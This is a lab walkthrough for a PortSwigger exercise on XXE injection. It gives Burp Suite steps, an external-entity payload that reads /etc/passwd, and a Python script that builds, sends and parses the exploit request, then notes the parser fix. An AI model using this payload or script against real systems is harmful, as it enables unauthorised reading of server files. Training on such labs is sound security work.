Exploiting XXE using external entities to retrieve files

1: Access the Lab.

Website: https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

2: Open the Burp Suite.

3: Select the product.

4: Select the Check stock.

5: Send the request to the Repeater.

Shortcut key: Ctrl + R

6: Send the request.

7: This is the XXE vulnerability: the Check stock request sends an XML body that the server parses, and the lab returns any unexpected productId value in its response, so whatever an entity expands to will be echoed back.

8: Insert the XXE payload into the vulnerable XML, between the XML declaration and the root (stockCheck) element. It declares an external entity named xxe whose value is read from /etc/passwd on the server.

XXE Payload: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

9: Send the request.

10: Replace the product ID with a reference to the entity. Declaring the entity alone does nothing; the file is only read where the entity is expanded.

Product ID: &xxe;

11: Send the request.

12: The response now contains the contents of /etc/passwd in place of the product ID, and the lab is marked as solved.
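The same steps, scripted, as an added example (this is not code from the lab or from PortSwigger). It inserts the DOCTYPE between the XML declaration and the root element, swaps the productId for the entity reference, optionally POSTs the body, and pulls the leaked file out of the response. The lab hostname, the stock-check path, and the exact "Invalid product ID: " prefix in the response are assumptions; the sample response is constructed so the script can be run offline.

```python
import re
import sys
import urllib.request

# Stock-check body as the lab's front end sends it (productId/storeId values vary).
ORIGINAL_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>'
)

# Assumption: every lab instance has its own hostname; replace before running live.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/product/stock"

# Constructed sample of what the lab returns once the entity is expanded.
SAMPLE_RESPONSE = (
    "Invalid product ID: root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)

XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def build_xxe_body(body: str, target_file: str = "/etc/passwd", entity: str = "xxe") -> str:
    """Steps 8 and 10: declare an external entity, then reference it in productId."""
    doctype = f'<!DOCTYPE test [ <!ENTITY {entity} SYSTEM "file://{target_file}"> ]>'
    m = XML_DECL.match(body)
    # The DOCTYPE must follow the XML declaration and precede the root element.
    if m:
        body = body[: m.end()] + doctype + body[m.end():]
    else:
        body = doctype + body
    # Only the reference triggers the file read; the declaration alone does nothing.
    body, n = re.subn(
        r"<productId>[^<]*</productId>", f"<productId>&{entity};</productId>", body, count=1
    )
    if n != 1:
        raise ValueError("no <productId> element found to replace")
    return body


def send_stock_check(url: str, body: str, timeout: float = 10.0) -> str:
    """Step 11: POST the crafted XML the way the Check stock button does."""
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def extract_leaked_file(response_text: str) -> str:
    """Strip the assumed 'Invalid product ID: ' prefix to leave the file contents."""
    prefix = "Invalid product ID: "
    idx = response_text.find(prefix)
    return response_text[idx + len(prefix):] if idx != -1 else response_text


def looks_like_passwd(text: str) -> bool:
    """Sanity check: a real /etc/passwd has a root entry with uid 0 and gid 0."""
    return re.search(r"^root:[^:]*:0:0:", text, re.M) is not None


if __name__ == "__main__":
    payload = build_xxe_body(ORIGINAL_BODY)
    print("Request body:\n" + payload + "\n")
    if len(sys.argv) > 1:  # live run: python xxe.py https://YOUR-LAB-ID.../product/stock
        response = send_stock_check(sys.argv[1], payload)
    else:                  # offline run against the constructed sample
        response = SAMPLE_RESPONSE
    leaked = extract_leaked_file(response)
    print("Leaked file:\n" + leaked)
    print("Looks like /etc/passwd:", looks_like_passwd(leaked))
```

The regex replacement is deliberately limited to the first productId so storeId and the rest of the document are left exactly as the application expects; a parser that rejects malformed XML before expanding entities would otherwise hide the result. On the defensive side the fix is the mirror image of step 8: configure the server's XML parser to refuse DTDs, or at least to not resolve external entities, so a SYSTEM declaration is never honoured.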
